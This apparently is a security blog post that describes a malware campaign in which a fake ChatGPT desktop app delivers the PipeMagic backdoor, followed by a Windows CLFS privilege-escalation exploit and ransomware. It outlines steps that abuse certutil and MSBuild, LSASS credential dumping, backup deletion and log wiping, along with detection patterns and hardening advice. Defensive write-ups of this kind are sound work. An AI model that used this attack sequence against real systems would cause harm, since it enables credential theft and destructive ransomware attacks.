By Alfaiz Nova, Cybersecurity Expert

Home
ChatGPT

PipeMagic Malware Masquerades as ChatGPT: Windows Vulnerability Exploited for Ransomware

Fake “ChatGPT Desktop” app drops PipeMagic backdoor; Storm‑2460 chains CLFS zero‑day (CVE‑2025‑29824) to deploy ransomware. Detection.

 

A futuristic desktop window labeled "ChatGPT" with a ghosted warning icon, an overlay of code, named-pipe glyphs, and a CLFS chip motif

Breaking Brief

  • A counterfeit “ChatGPT Desktop” app is delivering PipeMagic, a modular backdoor used by the financially motivated group Storm‑2460; the campaign chains a Windows CLFS zero‑day (CVE‑2025‑29824) for privilege escalation and culminates in ransomware deployment. Victims span IT, finance, and real estate across the U.S., Europe, South America, and the Middle East.microsoft+1

  • Delivery uses compromised legitimate sites, certutil‑based downloads, and malicious MSBuild projects to reflectively load PipeMagic in memory before exploiting CLFS to elevate privileges, delete backups, and prepare encryption.logpoint+1

Technical Deep Dive

  • Loader and disguise: Attackers fork a legitimate open‑source ChatGPT desktop project, injecting code to decrypt and run an in‑memory dropper that launches PipeMagic without obvious UI (blank‑app decoy variants seen since 2024).securityaffairs+1

  • Backdoor architecture: PipeMagic communicates over TCP to C2, then loads additional modules through encrypted named pipes, organizing them with in‑memory doubly linked lists for staging, execution, and comms—minimizing on‑disk artifacts.thehackernews+1

  • Exploit chain: certutil fetches a malicious MSBuild file from a compromised site; the file decrypts a payload via callback tricks (e.g., EnumCalendarInfoA), starts PipeMagic, then triggers CLFS EoP (CVE‑2025‑29824) ahead of ransomware launch.logpoint+1

  • Post‑EoP actions: LSASS dumping, backup deletion (wbadmin), BCD tampering to disable recovery, and log wiping (wevtutil), indicating a playbook for high‑impact encryption at scale.logpoint

AI‑Themed Social Engineering Trends

  • Brand abuse: Fake AI apps (ChatGPT desktop clients) serve as high‑trust lures; projects are cloned from GitHub and malvertised, with installers trojanized to drop loaders/backdoors.securityaffairs+1

  • ClickFix‑style flows: Users are steered via malvertising or compromised sites to “fix” prompts that silently load malicious installers—aligning with recent social engineering patterns.intruceptlabs+1

Detection Guide

  • Endpoint telemetry

    • Flag certutil network calls pulling MSBuild projects from unusual domains; correlate with msbuild.exe launching without a developer workflow.microsoft+1

    • Hunt for creation/use of random named pipes matching \.\pipe\1.<hex> patterns, followed by outbound TCP sessions to rare hosts.thehackernews

    • Detect BCD edits, wbadmin backup deletions, and wevtutil log clears within the same session—classic ransomware prep sequence.logpoint

  • Network/SWG

    • Block newly observed domains hosting “ChatGPT desktop” installers; inspect MSBuild payload downloads from compromised legitimate sites.intruceptlabs+1

    • Alert on anomalous TCP C2 beacons from endpoints that recently executed ChatGPT‑themed installers.thehackernews

Windows Hardening and Immediate Mitigations

  • Patch CLFS: Ensure April 2025 (and later) updates that fix CVE‑2025‑29824 are deployed on all Windows endpoints; prioritize admin workstations and servers.microsoft+1

  • Constrain LOLBINs: Block or restrict certutil and MSBuild on non‑developer machines via AppLocker/WDAC; enable ASR rules for Office/Mscript abuse and block process creations from PSExec/WMI if not required.logpoint

  • EDR controls: Turn on memory scanning and named‑pipe monitoring; add detections for EnumCalendarInfoA‑based loaders and reflective PE injection patterns.thehackernews+1

  • Software allowlisting: Only permit signed and verified installers; require code‑signed updates for any “ChatGPT desktop” tool; prefer official store or vendor channels.securityaffairs

ChatGPT App Verification Guide (for users)

  • Source of truth: Download only from the official publisher site or verified app stores; avoid “free enhanced ChatGPT desktop” links from ads or forums.securityaffairs

  • Signature check: Verify digital signature and publisher; hash‑check installers and compare to known‑good releases.securityaffairs

  • Behavior red flags: Blank UI, unexpected admin prompts, or background network activity during idle are indicators to quarantine and report.securityaffairs

Incident Response Procedures

  • Contain: Isolate affected hosts; block egress to suspicious C2; preserve volatile memory to capture in‑memory modules and named‑pipe indicators.logpoint+1

  • Eradicate: Remove persistence, rotate credentials, and reimage if LSASS dumping or backup deletions are confirmed; restore from known‑good backups after validating BCD and event log integrity.logpoint

  • Recover and monitor: Re‑enable recovery options, validate backups, and deploy detections for PipeMagic pipe naming and MSBuild reflective loaders across the fleet.thehackernews+1

more blog alfaiznova.com

Hey there! I’m Alfaiz, a 21-year-old tech enthusiast from Mumbai. With a BCA in Cybersecurity, CEH, and OSCP certifications, I’m passionate about SEO, digital marketing, and coding (mastered four languages!). When I’m not diving into Data Science or AI, you’ll find me gaming on GTA 5 or BGMI. Follow me on Instagram (@alfaiznova, 12k followers, blue-tick!) for more. I also run https://www.alfaiznova.in for gadgets comparision and latest information about the gadgets. Let’s explore tech together!"
NextGen Digital... Welcome to WhatsApp chat
Howdy! How can we help you today?
Type here...